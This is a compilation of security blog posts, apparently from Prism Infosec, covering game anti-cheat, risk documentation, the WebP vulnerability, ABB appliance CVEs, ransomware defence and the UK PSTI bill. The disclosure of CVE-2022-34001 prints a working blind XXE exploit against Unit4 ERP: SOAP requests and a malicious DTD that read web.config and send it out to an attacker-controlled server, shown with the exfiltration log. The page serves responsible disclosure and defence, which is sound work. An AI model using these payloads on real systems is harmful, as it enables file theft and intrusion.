Anti-debugging techniques involve incorporating measures within the game’s code to thwart attempts by hackers to analyse and manipulate the code using debugging tools. These techniques can include checks for debugging flags, breakpoints, or hooks commonly used by reverse engineers. Employing anti-debugging measures adds another layer of defence, making it more difficult for hackers to gain insights into the game’s inner workings.

By implementing these measures in tandem, game developers can create a multi-layered defence against hacking and cheating. Each approach targets different aspects of the cheating process, from manipulating memory values to injecting unauthorised code, making it increasingly difficult for hackers to compromise the game’s integrity.

Conclusion

It becomes clear that gaming holds an enchanting allure, often hiding its intricate workings beneath layers of entertainment. For the average player, the inner mechanisms and logic remain concealed, like a well-kept secret. Yet, with the revelation of game hacking, an entirely new realm of exploration unfurls—a space where curiosity and creativity blend harmoniously. Game hacking offers an engaging and interactive gateway into the world of reverse engineering, unlocking the door to understanding the complex underpinnings that powers our favourite virtual worlds.

However, this fascinating journey comes with a significant caveat. The very thrill of game hacking that invites exploration can also exact a heavy toll on the gaming industry. The continuous battle against cheating siphons resources, both financial and developmental, as game studios invest in creating anti-cheat mechanisms and safeguarding the integrity of gameplay. Cheats, once unleashed, wield the potential to tarnish the reputation of games and cast a shadow over the experience’s players hold dear. This can ultimately lead to lost customers and a diminished community spirit, as the spectre of dishonest manipulation threatens to unravel the bonds that gamers share.

In conclusion, game hacking unveils a world of hidden marvels beneath the surface of gaming, offering an engaging pathway into reverse engineering. Yet, this path, while captivating, brings to light the real-world repercussions that cheats and hacks can introduce. The industry’s efforts to maintain a fair and enjoyable gaming environment stand in stark contrast to the shadowy exploits of malicious manipulation, reminding us that while curiosity may drive exploration, the ethical balance is essential to preserve the magic of gaming for everyone.

Blog post was written by Ben Allford of Prism Infosec.

Why Failing to Document Risk is a Risky Strategy

Phil Robinson Explores why Failing to document risk leaves businesses vulnerable to cyber threats and costly consequences.

Understanding risk and its potential impact can help the business prepare for and survive the realization of its worst fears. It’s a pre-emptive measure and can head off threats and provide a way to control those risks continuously. Yet, despite the advantages of documenting risk, a surprisingly small number of businesses are doing it.

According to the UK government’s Cybersecurity Longitudinal Survey, only 30% of businesses have any documentation in place outlining how much cyber risk they are willing to accept (their risk appetite), and only 50% of businesses maintain a risk register (that details the cyber risks they are exposed to). 

Consequently, these businesses are not managing their cyber security posture appropriately because, without identifying and evaluating risk, these organizations cannot effectively invest in and defend their critical assets. In fact, it’s such a concern that the cyber security risk assessment is one of the four areas highlighted for further monitoring in the third wave of the report being carried out this year.

Why Is This Happening?

Those businesses that do document risk do so to meet contractual obligations or the requirements of certifications such as ISO 27001 and tend to have board oversight of their cyber security risk. It’s also a common requirement for those seeking cyber security insurance, of which 61% of businesses now have some form of, states the survey. It’s stipulated in compliance requirements associated with specific sectors, such as the Sarbanes-Oxley Act in US Finance or PCI DSS, to protect payment card data. 

Many may not document their risk because it can be daunting. Documentation is the final stage in the risk assessment process, preceded by scoping, identification, analysis, and evaluation. First, the business will need to decide where to focus the assessment. This is best approached by process or department to make it more manageable and to allow the necessary stakeholders to be involved. 

Once the scope has been decided, risks can be identified, and the likelihood of them being realized is assessed, followed by the potential impact and mitigation. But let’s look at each stage in turn.

Identifying risks may seem straightforward, but it’s not just a matter of inventorying data assets. Also under consideration are business-critical processes that, if subjected to attack, could prevent the business from functioning. Typical components subject to a risk assessment include hardware, software, data sets, services (including cloud / 3rd party services), personal information, business-critical information, and even staff members. Cyber threats and the tactics, techniques, and procedures used to execute them also need to be identified, and their possible outcomes and threat frameworks, such as MITRE ATT&CK, can help here.

Impact and Harm

The next stage is to estimate the likelihood of a risk being realized and its potential impact, i.e., the extent to which it can harm the business. Some use a “Red/Amber/Green” (RAG) system, making it more difficult to communicate risk to the board. It’s important to keep it simple and refer to the risk as low, minor, moderate, high, or severe and give a business context to the impact, such as loss of business/contract, loss of reputation, financial impact, or punitive measures/penalties rather than some obscure numerical value.

In managing risk, the organization should determine a threshold at which risks should be treated, known as the risk appetite. All organizations must take some risks. Otherwise, it would be too difficult to pursue the business objectives. However, the risk appetite for an organization can vary based upon factors such as the industry it operates in and company culture. For those risks that have been identified that exceed the organization’s risk appetite, they should be treated (for example, by applying further controls, changing practices to avoid the risk, or transferring the risk to a third party such as an insurer) such that any remaining residual risk is then at or below the acceptable level. 

All of these elements are then documented in a risk register, which should be reviewed regularly, as well as when disruptive events happen, be that the installation of new technology, a change in the direction of the business, or following a security incident. In this respect, the risk register should be considered a living document. Ownership of risk decisions must also be documented and again reviewed when such events occur in case there is a change to the designated person with responsibility.

Making the Process Easier

Because of the methodical stages involved, risk assessment lends itself well to a framework approach. Established risk methodologies include ISO 27005:2011, Information Security Forum (ISF) IRAM2, NIST (SP800-30), Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE), Octave Allegro, and ISACA COBIT 5 for risk. These can make it easier, but many businesses outsource risk assessment to a third party. Regardless of which is chosen, however, the assessment should always be tailored to the business to ensure it is both relevant and effective.

As onerous as the process may seem, failing to assess, manage, and document risk, as 70% of the businesses in the Longitudinal survey seem to have done, can prove costly in the long term. These businesses are much more exposed because they do not know and understand the risks they face, have made no effort to reduce the risk through controls, and have made no contingency plans in case of a compromise. 

The survey found that 74% of businesses were subjected to a cyber attack during the 12 months before June 2022, with 84% suffering repeat attacks. Almost a quarter (22%) were adversely impacted, losing access to data or services, having accounts compromised, or software, systems, or devices corrupted or damaged. In contrast, a third had to invest in new security controls, and the same number had to devote resources to dealing with such incidents. 

That’s proof, if any were needed, that neglecting to document risk can prove costly in the long run. But documenting risk is also valuable in another respect in that it gives the business oversight and more control over its operations. Having that knowledge can then bring about a better cultural understanding of cybersecurity throughout the business and help inform business decisions so that the process not only helps prevent harm but also helps guide future activity.

This article was originally published on Spiceworks

WebP’s Weak Spot: Unveiling the Hidden Vulnerability

Last month (September 2023), Google reported that a newly discovered security issue in Google Chrome had been found, it described as a ‘heap buffer overflow in WebP within Google Chrome’ and tracked under CVE-2023-4863. This was first thought to be just another minor bug found within the browser – something to be addressed in a future release. 

However, as the root cause was investigated further, it was found that the vulnerability existed not within Chrome, but within the libwebp library itself. This new information allowed security researchers to gain a better understanding of the potential wider impact of the issue and its links to other earlier reported vulnerabilities, including  CVE-2023-41064. 

With the wider impact now better understood, it became apparent that the vulnerability was not just confined to Chrome but had far-reaching consequences due to the widespread use of the WebP format within various applications; including browsers, email clients, mobile apps, and operating systems.

What is libwebp  and why is this a big deal?

The libwebp library is an image processing library, developed by Google and widely used by applications, such as Chrome, to process and render images in the ‘webp’ format.

WebP provides a number of benefits over other more established image formats (such as png, jpg) due to its flexibility in supporting features such as lossy and lossless compression, transparency & animation, making it a popular choice for those software developers wanting to integrate image rendering functionality into their applications and services. 

Typically, you’ll see WebP used in places like:

  • Websites: Modern content management systems and web frameworks often provide plugins or tools for serving WebP images. 
  • Android Devices: Android 4.2.1 (API level 17) and higher support WebP natively.
  • Apple Devices: WebP isnt natively supported, but third-party libraries, such as SDWebImage, provide WebP integration.
  • MacOS/Windows: Some modern image editors and viewers support WebP natively. For others, plugins or extensions might be required.

What’s the risk?

The  vulnerability was found to exist within the way the libwebp library handles Huffman coding within the WebP file format. Huffman coding, a method to efficiently represent data, was being mishandled, resulting in a potential buffer overflow. A specially crafted WebP image could exploit this flaw by allowing data to be written beyond the allocated memory space, leading to potential malicious attacks.

In real-world terms, this vulnerability has the potential to allow an attacker to create a specially crafted WebP image containing a malicious payload, which when processed by a vulnerable version of the libwebp library, could lead to the malicious payload being executed on the end users device. 

So, just by viewing an image, your device could be compromised.

Who’s at risk?

The good news? Not everyone! The bad news? Well, it’s a decent chunk of the internet. Vulnerable systems include web browsers, image processors, and applications using specific libraries to handle WebP, affecting all types of device from mobile, to desktop, to smart devices (such as your TV). 

Chances are, if it can be used to view an image, its moire than likely affected.

How can I protect myself from this and other similar vulnerabilities in future?

Well the good news is, there are ways of managing, not only the known risks, but also the unknown risks associated with vulnerabilities of this type.

Patch, Patch, Patch: For the end user, the most powerful tool you have at your disposal patching. It may seem like an overused cliché, but staying up to date with patches and updates is still one of the most powerful tools you have at your disposal for dealing with vulnerabilities and security risks. Vendors, including Google, have started rolling out patches, and it’s crucial to keep your systems updated. 

If there’s an update with a security patch for WebP handling for your application, jump on it like it’s a winning lottery ticket.

For the Tech Professionals amongst us, there are also a number of actions and considerations you can implement to minimise the risk to your systems and end users, including:

  • Memory Sanitisation: Developers should sanitise memory allocations, especially when handling external inputs (like WebP files from the internet). This can be achieved through techniques like bounds checking and proper memory management.
  • Input Validation: Always validate and sanitise input. Ensure that imported or user supplied media, such as WebP images, conform to expected standards before processing.
  • Use a Web Application Firewall (WAF): WAFs can detect and block malicious requests, including those carrying files carrying unwanted surprises, such as malicious code.
  • Regular Code Audits: Regularly review and test your code base for vulnerabilities. Automated tools can help, but manual reviews by experienced developers are invaluable.

On the surface of it, these types of vulnerabilities may sound scary – especially when the risks are embellished and exaggerated by those ever diligent news outlets that consider a Twitter post to be a credible source – but remember, by the time the story of a new vulnerability has broken, the software and service providers impacted have been busy behind the scenes working on addressing the risk, with an update or patch following soon after. 

Privilege Escalation and RCE Vulnerabilities for Multiple ABB Appliances [ASPECT, Matrix, Nexus]. (CVE-2023-0635 / CVE-2023-0636)

Prism Infosec recently identified two high risk vulnerabilities within the ABB Aspect Control Engine affecting versions prior to 3.07.01. The two vulnerabilities discovered could result in remote code execution (RCE), and privilege escalation within ABB’s Aspect Control Engine software. 

Background

During a recent security testing engagement, Prism Infosec discovered an ABB Aspect Appliance through traditional enumeration techniques. A Google search revealed that this is a building management control system and this instance it was misconfigured to be publicly available to the Internet.

Typically, administrative interfaces should not be externally accessible over the Internet unless absolutely necessary. Where this is unavoidable, they should require a secondary layer of authentication such as VPN Access, IP address whitelisting with further controls such as Multi-factor Authentication (MFA).

Prism Infosec gained initial access to the admin interface by using the default credentials documented in the Aspect Control Engine’s publicly available user manual. 

Exploitation

Following this access, Prism Infosec were able to identify that the Network Diagnostic function of the ASPECT Appliance was vulnerable to Remote Code Execution, which allowed us to gain access via a reverse-shell to the underlying Linux Operating System and associated internal network infrastructure. 

Full details of the Proof of Concept (PoC) are currently being withheld to ensure that all ABB customers have a chance to update and patch the vulnerable software. 

Once initial access was achieved, a check against the privileges revealed that the software was running as the ‘apache’ user, a relatively low-level user with limited functionality. 

After further investigation, Prism Infosec identified an unintended privilege escalation vulnerability, built into the underlying OS of the ABB Appliance. This then allowed the user to escalate to a root account.

The possibilities here are endless for an adversary, from exfiltrating local data, to enumerating and moving laterally through the internal network. 

To summarise, Prism Infosec went from an external IP address open to the internet, to a rooted Linux system, inside an internal network. 

Resolution

Prism Infosec quickly made our client aware of these vulnerabilities and disclosed to ABB the findings within their software shortly after. We were delighted to see both parties quickly acknowledging and acting on these issues, from the client ensuring these levels of access were disabled and ABB to patching and releasing an update and advisory to their clients.

Note: As of the current time of writing Prism Infosec will not divulge exact details on how to reproduce these vulnerabilities to ensure users have time to patch and remedy. However, this blog will entail a high-level description before our detailed description on how to reproduce these vulnerabilities is released in the next 90 days (30th August 2023).

Credits and References

  • CVE-2023-0635 – Privilege escalation to root was discovered by George C
  • CVE-2023-0636 – Remote code execution was discovered by Karolis N

CVE-2023-0635 Privilege escalation to root
The successful attacker can open a shell and escalate access privileges to root.

CVSS v3.1 Base Score: 7.8
CVSS v3.1 Temporal Score: 7.4
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:W/RC:C
CVSS v3.1 Vector:
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:W/RC:C
NVD Summary Linkhttps://nvd.nist.gov/vuln/detail/CVE-2023-0635

CVE-2023-0636 Remote code execution
The successful attacker is able to leverage a vulnerable network diagnostic component of the ASPECT interface, to perform Remote Code Execution.

CVSS v3.1 Base Score: 7.2
CVSS v3.1 Temporal Score: 7.0
https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:F/RC:C

CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:F/RC:C
NVD Summary Linkhttps://nvd.nist.gov/vuln/detail/CVE-2023-0636

Timeline

  • Vulnerabilities discovered during the assessment: [05/10/2022]
  • Vendor Informed: [07/10/2022]
  • First Meeting with ABB and Prism Infosec: [11/10/2022]
  • Final Meeting with ABB and Prism Infosec: [22/05/2023]
  • Vendor Confirmed Fix, and communicated to customers: [01/06/2023]
  • CVE Assigned: [05/06/2023]
  • Prism Infosec Blog Post: [05/06/2023]

How to Protect the Business Against a Data Breach/Ransomware

Threats to the business can come in various forms but by far the most common and significant is a data breach. Usually leveraged via a successful phishing or spear phishing attack, this then results in either sensitive information (such as a username and/or password) being disclosed or a compromise of target endpoints such as laptops or mobile devices 

Both attack vectors could then see unauthorised remote logins to organisational services or data, which an attacker can then use to exfiltrate sensitive information. This could include personal data (names, addresses, dates of birth, medical data et al), banking details, credit card information, or company intellectual property. 

The information will then either be sold (usually at a price per record), used to target other individuals with fraudulent attacks, or be associated with a ransomware situation where either it may then be permanently encrypted and/or released publicly if the attackers do not receive payment within a certain time. Over the last few years, it’s this latter scenario that has come to dominate, as organised criminal gangs become more adept at extorting funds from targets.

Are you prepared?

Yet, despite the dearth of data breaches reported year after year, organisations still fail to prepare for what is rapidly becoming almost inevitable. If the business isn’t ready, it can’t respond effectively or communicate with internal and external stakeholders such as customers and clients, C-Suite and third-party organisations such as the ICO. This results in a loss of confidence and unwanted publicity, as well as the organisation spending unnecessary time resolving incidents effectively and the potential financial loss of paying the ransom. 

To protect themselves from such attacks, organisations should implement a variety of defences. It’s important to deliver regular security awareness programs to staff, warning of the risk of clicking on unknown links or opening files or attachments, for instance, but these need to be regularly scheduled and be appropriate. The most effective security awareness briefings will be relatively succinct and interesting to staff, for example by containing relevant and interesting examples of the potential impacts, rather than being a lecture.

With regards to technical security controls, the business should implement endpoint and cloud-based protection which can protect against known and new attacks and as well as monitoring and alerting systems to facilitate rapid identification and reporting of any potential attempts and actual breaches within the business environment. Also, put in place strong endpoint configuration that limits the privileges of users, restricts the execution of unknown and untrusted applications and reduces the attack surface through reduction of unnecessary functionality (Command Prompts, Powershell, default bundled software etc). 

Locking down data is essential so ensure that data storage is resilient to unauthorised attempts to modify files, using techniques such as inherent versioning and/or offline data snapshots and backups. Remain vigilant through the implementation of monitoring and alerting mechanisms across server, endpoint and cloud environments and keep things fresh through regular security reviews of device endpoints and data storage and applications to test their resilience to ransomware attacks. 

If the worst does happen, you’ll want to rely on an effective incident response plan being in place as well as team preparedness, having conducted scenario-based penetration testing (“red team”) attack simulations as well as desktop simulated breach exercises to ensure that the security teams know how to handle breaches quickly and effectively.

Policy and process

However, it cannot be overstated how important it is to have a reasonable and applicable (to the business) set of security policies, procedures and plans to support information security and to govern user behaviour. 

An overarching information security policy should put security centre stage and reveal the management commitment to it as well as prescribing a framework of other documents such as an acceptable use policy, incident response plan, access control and data handling policies. Many organisations are now already aligned or certified to standards such as ISO27001, which provides a framework for management of an information security management system (ISMS). 

Be Proactive

Finally, be proactive. Regularly review the data that is being collected and stored by the organisation, whether on-premise or in the cloud, assess its importance to the business and ensure that there are suitable controls in place to protect it from exposures and loss. Ensure that offline backups, snapshots, and/or data versioning exist and consider the impact of data being deleted, encrypted or leaked. Regularly advise your staff on existing and new cyber security threats, and consider future and evolving attacks such as voice/messaging attacks, as detection of email based phishing attacks forces attackers to seek alternative avenues.

CVE-2022-34001 – XML External Entity (XXE) in Unit 4 ERP 7.9 (Also Known As “Agresso”)

Prism Infosec Identified an XXE vulnerability within Unit4’s Enterprise Resource Planning (ERP) software. This has been assigned CVE-2022-34001. Unit4’s ERP software is a well-known enterprise management suite, which includes financial and project management tools.

Prism Infosec discovered a blind XXE within a specific function of the ERP software. This would allow an authenticated attacker to read arbitrary files from the host server.

CVE-2022-34001 – Proof of Concept

The ERP API supported the use of SOAP calls; Curiously, the ‘ExecuteServerProcessAsynchronously’ SOAP call allowed the insertion of arbitrary XML within its body.  To test for XXE, Prism used a simple HTTP outbound call to a Burp Collaborator server to confirm that the XML allowed for entity expansion, and also allowed the SYSTEM call. 

The following request shows a snippet of the ‘ExecuteServerProcessAsynchronously’ SOAP call with the embedded XXE payload within XML tags:

POST /BusinessWorld-webservicestest/service.svc HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Host: api-services.redacted.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 743

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
</Variant>
        <Xml>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://burp_collaborator.com"> %dtd;]><xxx/>]]>
</Xml>
      </input>
<credentials>
…[REDACTED]…
</credentials>

This resulted in an HTTP request to the Prism Infosec controlled server:

The request was received from IP address [REDACTED] at 2022-Mar-01 11:24:45 UTC.

GET / HTTP/1.1
Host: burp_collaborator.com

Connection: Keep-Alive

This confirms that entity expansion was enabled, along with being able to leverage protocols such as HTTP and FILE. As SOAP request only responded with an error message, this attack was considered ‘blind’ – so out of band techniques were required to exfiltrate data from the host. 

On an attacker-controlled server, the following malicious DTD file was hosted (test.xml):

<!ENTITY % start "<[CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % outfile SYSTEM "file:///E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config">
<!ENTITY % goout "<!ENTITY &#37; pop SYSTEM 'http://attacker_controlled_server:8000/%start;%outfile;
%end;
'>">

The SOAP call was then initiated but referencing the malicious DTD along with the parameter entities to exfiltrate the data:

POST /BusinessWorld-webservicestest/service.svc HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: http://REDACTED/ImportService/ImportV200606/ExecuteServerProcessAsynchronously
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Host: api-services.redacted.com
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 743

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ExecuteServerProcessAsynchronously xmlns="http://REDACTED/ImportService/ImportV200606">
<input>
<ServerProcessId>GL07</ServerProcessId>
<MenuId>BI88</MenuId>
<Variant>104</Variant>
<Xml>
<![CDATA[
<!DOCTYPE doc[
<!ENTITY % dtd SYSTEM "http://attacker_controlled_server:8000/test.xml">
%dtd;
%goout;
%pop;
]>
]]>

</Xml>
</input>
--[Cut]--

On the attacker controlled server, a listener was set up to serve the malicious DTD, and also catch the contents of the file being read:

Serving HTTP on 0.0.0.0 port 8000 ...
api-services_ip - - [02/Mar/2022 12:54:16] "GET /test.xml HTTP/1.1" 200 -
api-services_ip - - [02/Mar/2022 12:54:04] "GET /%3C[CDATA[%0D%0A%3C!--%0D%0A%20%20For%20more%20information%20on%20how%20to%20configure%20your%20ASP.NET%20application,

%20please%20visit%20%0D%0A%20%20http://go.microsoft.com/fwlink/?LinkId=301879%0D%0A%20%20--%3E%0D%0A%3Cconfiguration%3E%0D%0A%20%20%3CconfigSections

--[Cut]--

The decoded data reveals the content of the “E:\Program Files\UNIT4 Business World On! (v7)\Web Api\web.config” file on the api-services host:

/<[CDATA[
<!--
  For more information on how to configure your ASP.NET application, please visit 
  http://go.microsoft.com/fwlink/?LinkId=301879
  -->
<configuration>
  <configSections>
    <section name="agresso.web.api" type="Agresso.Web.Http.Configuration.WebApi.WebApiConfigurationSection, Agresso.Web.Http" />
  </configSections>
--[Cut]—

The XXE could also be leveraged to make Server-Side Request Forgery (SSRF) calls within the internal network; mapping out the internal network, and making arbitrary requests to any internal hosts. 

Prism Infosec contacted the vendor (Unit 4); and supplied all the necessary information so that Unit 4 could confirm and subsequently remediate the vulnerability. Unit 4 responded in a timely matter and started working on a fix for all customers. 

Although the test was completed on the latest version of Unit 4 ERP, we have been advised that previous versions of the software may also be affected. 

Note: Prism Infosec did not confirm if the vulnerability had been patched; No further testing was conducted after the initial engagement. 

Timeline – CVE-2022-34001

  • Discovered by Prism Infosec during an engagement for client: March 1st 2022
  • Vendor Informed: March 17th 2022
  • CVE Assigned: June 19th 2022
  • Vendor Confirmed Fix, and communicated to customers: July 7th 2022 
  • Prism Infosec Blog Post: July 19th 2022

Vulnerability was discovered and written by Alexis Vanden Eijnde of Prism Infosec.

What is the PSTI and will it improve IoT security?

By Phil Robinson

The new Product Security and Telecommunications Infrastructure (PSTI) Bill currently going through parliament comprises two parts. The first aims to put in place safeguards to regulate the secure design of the Internet of Things (IoT) while the second will ensure broadband and 5G networks are gigabit-grade. It’s the first part that has caused a stir because it will, for the first time, see the introduction of enforceable regulation. 

Applicable to consumer products such as smartphones, connected cameras, TVs and speakers, fitness trackers, toys, white goods such as smart washing machines and fridges and home equipment such as smoke detectors and door locks, home automation and alarm systems, the regulations stipulate that manufacturers must:

  • Not use default passwords
  • Have a vulnerability disclosure policy
  • Be open about the length of time the product will be supported with security updates

Yet, while the move to regulate the IoT is regarded as long overdue, the PSTI has been criticised for not going far enough, particularly given the number of well-documented security vulnerabilities exhibited by smart technology.

Why is the IoT so insecure?

The root cause of the majority of issues that have plagued consumer hardware is that manufacturers are cost driven and aim to be quick to markets and in many cases this had led to shortcuts or a complete lack of information security during the design process. This has resulted in common security weaknesses long since addressed in more mature software and hardware products, such as default usernames and passwords or straightforward password bypasses, weak encryption (hashes) for password storage and a lack of encryption for data transfer across open networks for administrative traffic, being widely used in the IoT. 

In addition, the sector has suffered from other issues. such as a lack of security around the firmware update processes (such as a lack of signing) and also hardware interface exposures that allow for straightforward access to low level functions of the device or its components (such as memory). And whereas it was hoped the sector would self-regulate, this doesn’t seem to have happened, with a report by the Internet of Things Security Foundation in 2020 finding that only 1 in 5 manufacturers had a disclosure process, meaning the majority could not be alerted to a security vulnerability.

Where does the PSTI fall short?

The bill currently addresses the most significant and easily exploitable weaknesses in IoT devices: the use of default passwords, however many other common security weaknesses have not been covered at this stage. That said, the use of default passwords is by far the most common way that an IoT device will be compromised and it is a significant first step in improving the security of these products. 

Focusing on default settings is also easy to establish whether the manufacturer is in breach of the bill, whereas other measures (such as ensuring a stringent code review process to identify access control bypasses or input validation weaknesses) will not be so straightforward to ascertain. 

The bill also does not stipulate a minimum support period for security updates for consumers, thus manufacturers can still release products without a commitment to supporting it, leaving this decision in the hands of consumers who may not necessarily understand the risks.

Understandably perhaps, its not being retroactively deployed so won’t apply to the army of devices currently out there, and while manufacturers must have a disclosure channel, there’s no compunction or timeframe for them to notify their users of any reported vulnerability. Nor is there any focus on the patch management: users often find these difficult to implement so some move towards over-the-air or automated patching would have been welcome.

As mentioned above, there are many other vulnerabilities that can be used to exploit IoT devices, including disrupting administrative traffic, identifying and exploiting flaws in web or file transfer services running on the device, causing denial of service, interfering with the update process and deploying rogue firmware or exploiting the devices with physical access. 

So is the PSTI too little too late?

The PSTI is still winding its way through parliament and is unlikely to pass into law until 2023 but when it marks an important first step in the regulation of an industry that has previously been seen as playing fast and loose. It will force IoT product vendors around the world to consider the security associated with their consumer devices and will provide a baseline of protection for devices being sold to the public in the UK. And it will also see offending vendors held to account for the first time if they do not abide by the articles of this law. 

It’s important to remember that while the bill doesn’t cover as many of the security issues one might have hoped, it does cover the vulnerability with the highest likelihood and impact of exploitation. Other key requirements such as ensuring a vulnerability disclosure policy and ensuring transparent advice on the time that security updates will be released are also welcome measures and support the improvement of product security over time.

Knowing how long a product will be supported will help consumers make an informed decision and is likely to be used by consumer support organisations such as Which? To differentiate offerings. In many ways, it sets a bar by which vendors can be measured and could lead to the emergence of consumer kitemarks so that security becomes not a sunk cost but a differentiating factor that manufacturers can use to boost sales.

IoT devices do, of course, also impact the corporate environment either because users seek to use these on the network or by acting as potential conduits for an attack, such as ransomware or the large scale DDoS attacks we saw carried out by the Mirai botnet that enslaved thousands of IoT devices. Consequently, the PSTI will affect businesses too and, depending on how the regulation evolves, it could even have a direct impact on security team workloads, particularly if it seeks to address patch management in the future.